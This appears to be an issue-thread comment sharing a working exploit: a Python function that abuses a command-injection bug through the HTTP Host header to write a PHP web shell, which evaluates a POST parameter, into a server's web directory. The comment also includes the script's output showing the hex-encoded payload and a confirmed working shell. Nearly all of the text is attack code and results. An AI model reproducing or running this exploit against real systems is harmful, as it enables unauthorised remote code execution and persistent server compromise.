Open EvergreenCartoons opened 2 years ago
This actually works completely fine on our target.
def upload_webshell(base_url, target_path): print("(+) Using command injection bug to inject webshell") php_code = f"<?$a=fopen(\"{shell_fullpath}\",\"w\") or die();$t='{shell_code}';fwrite($a,$t);fclose( $a);?>" # encoded_php = base64.b64encode(php_code.encode('ascii')) encoded_php = binascii.hexlify(php_code.encode('ascii')) encoded_php = encoded_php.upper() print(encoded_php) command_string = f"' *; echo '16i {encoded_php.decode('ascii')} P' | dc | php; '" print(command_string) headers = {'Host': command_string} target_url = base_url + target_path r = requests.get(target_url, headers=headers, verify=False)
$ python3 test.py (+) Using command injection bug to inject webshell b'3C3F24613D666F70656E28222F7573722F6C6F63616C2F7777772F73797374656D5F616476616E6365645F636F6E74726F6C2E706870222C22772229206F722064696528293B24743D273C3F706870206576616C28245F504F53545B313333375D293B3F3E273B6677726974652824612C2474293B66636C6F736528202461293B3F3E' ' *; echo '16i 3C3F24613D666F70656E28222F7573722F6C6F63616C2F7777772F73797374656D5F616476616E6365645F636F6E74726F6C2E706870222C22772229206F722064696528293B24743D273C3F706870206576616C28245F504F53545B313333375D293B3F3E273B6677726974652824612C2474293B66636C6F736528202461293B3F3E P' | dc | php; ' None (+) Checking for our webshell... (+) Shell works! True
This actually works completely fine on our target.